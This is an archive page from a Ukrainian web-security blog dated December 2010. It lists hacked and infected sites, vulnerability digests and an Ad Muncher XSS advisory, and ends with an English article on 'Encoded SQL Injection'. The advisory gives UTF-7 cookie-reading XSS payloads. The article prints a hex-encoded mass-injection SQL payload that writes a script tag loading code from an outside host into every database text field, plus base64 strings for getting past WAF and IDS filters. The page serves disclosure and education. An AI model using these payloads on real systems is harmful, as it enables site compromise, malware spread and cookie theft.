Архів за Грудень, 2010

Похакані сайти №127

20:01 29.12.2010

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.slavrada.gov.ua (хакером Lekosta) - 29.10.2010, похаканий форум державного сайта, зараз він вже виправлений адмінами
  • http://palliativecare.gov.ua (хакером GHoST61) - 09.12.2010, похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://vitrina.com.ua (хакером DeviL Hacker) - 07.10.2010, зараз сайт не працює і редиректить на інший сайт
  • http://wpp.pp.ua (хакерами з 1923TURK-GRUP) - 14.12.2010, зараз сайт вже виправлений адмінами
  • http://rcmdc.com.ua (хакером GHoST61) - 11.12.2010, зараз сайт вже виправлений адмінами

Добірка уразливостей

15:13 29.12.2010

В даній добірці уразливості в веб додатках:

  • XSS and Content Injection in HTC Windows Mobile SMS Preview PopUp (деталі)
  • SQL injection vulnerability in TCMS (деталі)
  • Local File Inclusion in TCMS (деталі)
  • SQL injection vulnerability in CompuCMS (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Unauthorized Information Disclosure, Unauthorized Data Modification, Denial of Service (DoS) (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS), Denial of Service (DoS), Execution of Arbitrary Code, Unauthorized Access (деталі)
  • SQL injection vulnerability in CompuCMS (деталі)
  • XSS vulnerability in CompuCMS (деталі)
  • HP Operations Manager for Windows, Remote Execution of Arbitrary Code (деталі)
  • XSS vulnerability in CompuCMS (деталі)

Уразливості на www.watchmouse.com

23:57 28.12.2010

У вересні, 19.09.2010, я знайшов Abuse of Functionality та Insufficient Anti-automation уразливості на сайті http://www.watchmouse.com. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Abuse of Functionality:

http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl=http://google.com

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сервери самого сервісу. Один запит до даного функціоналу призведе до десяти запитів (з 10 різних серверів) до цільового сайта.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі).

Експлоіт для Microsoft Internet Explorer

22:37 28.12.2010

Продовжуючи розпочату традицію, після попереднього відео про безпеку веб шлюзу, пропоную нове відео на веб секюріті тематику. Цього разу відео про eксплоіт для Microsoft Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.

Metasploit Internet Explorer CSS Tags

В відео показаний процес атаки на користувачів IE через пошкодження пам’яті в бібліотеці mshtml.dll. Дана уразливість стосується Internet Explorer 6, 7 і 8. Для створення експлотіа використовується Metasploit Framework. Рекомендую подивитися дане відео для розуміння векторів атак на браузер Internet Explorer.

Opera 10 та Opera 11

20:02 28.12.2010

Якщо 01.09.2009 вийшла Opera 10, яка додала нових проблем з безпекою (як це робить кожна нова версія браузера). То 16.12.2010 вийша нова версія браузера - Opera 11.

Нова версія Opera є значним оновленням браузера, що додає новий функціонал, а також покращує безпеку браузера. Серед найбільш значних змін:

  • Підтримка розширень.
  • Групування вкладок.
  • Покращене управління жестами миші.
  • Адресний рядок, що відображає рівень безпеки.
  • Підвищена швидкодія браузера.

Серед виправлень безпеки в Opera 11:

  • Виправлена уразливість, коли контент веб сторінок міг показувати некоректну секюріті інформацію.
  • Виправлена уразливість, що дозволяла витік інформації про зміст WAP форм на інші сайти.
  • Виправлено декілька уразливостей викого ризику.

По матеріалам http://www.opera.com.

Уразливість в Ad Muncher

15:29 28.12.2010

25.05.2010

Раніше я вже писав про універсальну XSS уразливість в Ad Muncher. І сьогодні я знайшов нову Cross-Site Scripting уразливість в Ad Muncher, яка має місце на місці попередної уразливості (що була виправлена в 2007 році).

Тобто я обійшов захисні фільтри програми і відновив універсальну XSS в Ad Muncher. Про що вже повідомив розробникам.

Детальна інформація про уразливість з’явиться пізніше.

28.12.2010

По замовчуванню в Ad Muncher v4.71 та наступних версіях відключене виведення поточної URL в тіло поточної сторінки (в helper script) і при цьому виправлена попередня уразливість. Але використовуючи інші вектори атаки все ще можна провести XSS атаку, коли опція ShowURLInHelper включена.

XSS:

Це універсальна XSS. Можливі reflected XSS та Saved XSS атаки з використанням даної уразливості.

Атака можлива в наступних випадках (у будь-яких браузерах):

1. На сторінках з UTF-7.

http://site/utf-7.html?--+AD4-+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

При запиті до сторінки код автоматично виконається.

Атака може бути проведена на будь-яких сайтах, що мають UTF-7 сторінки, або дозволяють завантажувати на них веб сторінки (і таким чином можна задати кодування UTF-7).

2. На сторінках з будь-яким кодуванням окрім UTF-7.

http://site/utf-8.html?--+AD4-+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

При відвіданні сторінки потрібно змусити жертву змінити кодування на UTF-7 і код автоматично виконається. Дана атака подібна до strictly social XSS в Mozilla та Firefox, про яку я писав в записах Cross-Site Scripting в Mozilla та Firefox та Cross-Site Scripting з UTF-7 в Mozilla та Firefox. Вона можлива в браузерах Mozilla 1.7.x та попередні версіях, Firefox 1, Firefox 2 і Firefox 3.0 та Firefox 3.0.1 (та інших браузерах, що дозволяють встановити кодування UTF-7).

Уразливі Ad Muncher v4.81 та попередні версії. В версії Ad Muncher v4.9 дана уразливість вже виправлена.

Грудневий вівторок патчів від Microsoft

22:46 27.12.2010

В грудні місяці Microsoft випустила 17 патчів. Що значно більше ніж у листопаді. Що стало новим рекордом (попередній був у жовтні, коли компанія випустила 16 патчів).

У грудневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 17 бюлетенів по безпеці. Що закривають більше 40 уразливостей в програмних продуктах компанії. В тому числі два патчі виправляють дев’ять критичних уразливостей, які дозволяють виконати довільний шкідливий код на віддаленому комп’ютері.

Дані патчі стосуються таких продуктів компанії як ОС Microsoft Windows та додатки Internet Explorer, Exchange Server, Windows Movie Maker, Windows Media Encoder, Publisher, SharePoint та Microsoft Office.

Інфіковані сайти №59

19:29 27.12.2010

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://ivanco-travel.com - інфекція була виявлена 10.12.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://imhobest.in.ua - інфекція була виявлена 23.10.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://rostfrost.com.ua - інфекція була виявлена 26.12.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 79 разів протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://gurman-prom.ua - інфекція була виявлена 18.11.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 9 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://skylogic.com.ua - інфекція була виявлена 13.11.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 5 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.

Як і у випадку з іншими веб сайтами, інфіковані сайти gurman-prom.ua і skylogic.com.ua також хостить в себе Укртелеком.

Добірка уразливостей

15:14 27.12.2010

В даній добірці уразливості в веб додатках:

Encoded SQL Injection vulnerabilities

22:48 25.12.2010

This is English version of my Encoded SQL Injection vulnerabilities article.

In article Advanced methods of SQL Smuggling, I mentioned about Encoded SQL Injection - new class of SQL Injection, which I found in 2009. I.e. this is subclass of SQL Injection vulnerabilities. And now I’ll tell you about it in detail.

Last year, 17.05.2009, I found SQLi vulnerability which I related to new type of SQL Injection - Encoded SQL Injection. About Encrypted XSS (Encoded XSS) I already mentioned many times, and in this article I’d tell about Encoded SQLi. In classification of SQL Injection vulnerabilities (in 2008) I gave two types of SQLi - Reflected SQL Injection and Persistent SQL Injection. So Encoded SQL Injection will be third type.

These vulnerabilities allow to bypass protection systems - as built-in in web application protection filters, as installed at the server IDS, IPS and WAF systems. Therefore I related this type of SQL Injection vulnerabilities to advanced methods of SQL Smuggling.

Types of Encoded SQL Injection.

There are next types of Encoded SQL Injection:

  • Partly encoded SQLi.
  • Completely encoded SQLi.

If first type still can be revealed by some protection systems (if they set on appropriate operators of SQL language), then second type will not be entirely revealed by current protections systems. Besides those systems which support decoding of this encoding method.

Partly encoded SQLi.

In case of partly encoded SQL Injection, data which is sending to DBMS is encoding only partly. It’s when only some part of SQL code is encoded (e.g. via CAST). Encoding of strings for bypassing of quotes filtration is not relating to this.

As in case mentioned in the post Encoded SQL Injection, when this type of SQLi is using for attack on one site (at that on usual SQLi vulnerability):

DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000));EXEC(@S);--

Completely encoded SQLi.

In case of completely encoded SQL Injection, data which is sending to DBMS is encoding completely. So the whole SQL query is encoded (at interface level) and only at web application level it is decoding for sending to DBMS. Particularly in variant of encoded SQL Injection, which I found last year, base64 encoding is using.

When web application is using base64-stings for sending of values to web application, it can be used for conducting of Encoded SQLi attacks.

For example, string ‘ or 1=1# will become JyBvciAxPTEj. And string ‘ and 1=’1 will become JyBhbmQgMT0nMQ==.

And at level of external protection systems, which don’t support decoding of data which is sending to web application, these and other encoded strings will not cause any suspicions. So installed at the server IDS, IPS and WAF systems will can’t reveal these attack (and it’ll be hard to reveal them in the logs). And these attacks will pass successfully bypassing of protection systems.